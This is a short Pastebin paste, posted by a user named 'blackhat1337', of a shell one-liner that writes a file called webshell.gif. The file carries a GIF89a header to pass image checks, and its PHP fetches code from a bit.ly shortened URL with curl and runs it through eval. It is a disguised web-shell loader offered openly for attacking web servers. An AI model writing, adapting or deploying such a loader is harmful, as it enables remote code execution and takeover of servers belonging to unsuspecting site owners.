blackhat1337

mydb.gif.php

May 29th, 2024
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.26 KB | None | 0 0
  1. printf
  2. “GIF89a;
  3. <?php
  4. $link = 'https://bit.ly/4dzmi5N';
  5. $ch = curl_init();
  6. curl_setopt($ch, CURLOPT_URL, $link);
  7. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  8. $output = curl_exec($ch);
  9. curl_close($ch);      
  10. eval ('?>'.$output);
  11. ?>" > webshell.gif
  12.  
Add Comment
Please, Sign In to add comment